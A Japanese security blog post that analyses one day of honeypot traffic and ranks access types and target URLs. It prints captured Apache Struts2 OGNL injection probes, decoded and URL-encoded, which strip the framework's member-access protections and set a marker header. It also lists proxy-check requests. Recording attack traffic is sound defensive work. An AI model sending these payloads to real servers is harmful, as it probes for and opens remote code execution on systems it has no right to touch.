Nickセキュリティログ

ハニーポット、バグバウンティ、CTFなどなどセキュリティ関係のことを備忘録がてら書いていきます

1月25日(金) ハニーポットアクセス解析

struts2の脆弱性を確認するものが来ていました。

URLが長いのがまとめるときにめんどくさいんですよねぇ・・・

URLデコードしました↓。 

 

{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):*1.(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.addHeader('eresult','struts2_security_check'))}/login.action HTTP/1.1

 

攻撃種別アクセスランキング

詳細 アクセス数
webアクセス 48
struts2脆弱性調査 16
プロキシ確認 5
tomcat確認 1
MySQL調査 1



 
 
 

アクセス先別ランキング
 

順位 検知数 URL 備考
1 44 GET / HTTP/1.1 webアクセス
2.5 7 POST /login.action HTTP/1.1 struts2脆弱性調査
2.5 7 POST /index.action HTTP/1.1 struts2脆弱性調査
4 2 GET / HTTP/1.0 webアクセス
10 1 GET /mysql/admin/index.php?lang=en HTTP/1.1 MySQL調査
10 1 POST /%25%7b(%23dm%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23_memberAccess%3f(%23_memberAccess%3d%23dm)%3a*2.(%23ognlUtil.getExcludedPackageNames().clear()).(%23ognlUtil.getExcludedClasses().clear()).(%23context.setMemberAccess(%23dm)))).(%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse()).(%23res.addHeader(%27eresult%27%2c%27struts2_security_check%27))%7d/login.action HTTP/1.1 struts2脆弱性調査
10 1 POST /%25%7b(%23dm%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23_memberAccess%3f(%23_memberAccess%3d%23dm)%3a*3.(%23ognlUtil.getExcludedPackageNames().clear()).(%23ognlUtil.getExcludedClasses().clear()).(%23context.setMemberAccess(%23dm)))).(%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse()).(%23res.addHeader(%27eresult%27%2c%27struts2_security_check%27))%7d/index.action HTTP/1.1 struts2脆弱性調査
10 1 GET /manager/html HTTP/1.1 tomcat確認
10 1 HEAD / HTTP/1.0 webアクセス
10 1 GET /version HTTP/1.1 webアクセス
10 1 POST http:[//]check.proxyradar.com/azenv.php?auth=154841159051&a=PSCMN&i=3468503894&p=80 HTTP/1.1 プロキシ確認
10 1 POST http:[//]check.proxyradar.com/azenv.php?auth=154839426593&a=PSCMN&i=3468503894&p=80 HTTP/1.1 プロキシ確認
10 1 POST http:[//]check.proxyradar.com/azenv.php?auth=154837741905&a=PSCMN&i=3468503894&p=80 HTTP/1.1 プロキシ確認
10 1 POST http:[//]check.proxyradar.com/azenv.php?auth=154836047255&a=PSCMN&i=3468503894&p=80 HTTP/1.1 プロキシ確認
10 1 POST http:[//]check.proxyradar.com/azenv.php?auth=154834328155&a=PSCMN&i=3468503894&p=80 HTTP/1.1 プロキシ確認

*1:#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class

*2:%23container%3d%23context%5b%27com.opensymphony.xwork2.ActionContext.container%27%5d).(%23ognlUtil%3d%23container.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class

*3:%23container%3d%23context%5b%27com.opensymphony.xwork2.ActionContext.container%27%5d).(%23ognlUtil%3d%23container.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class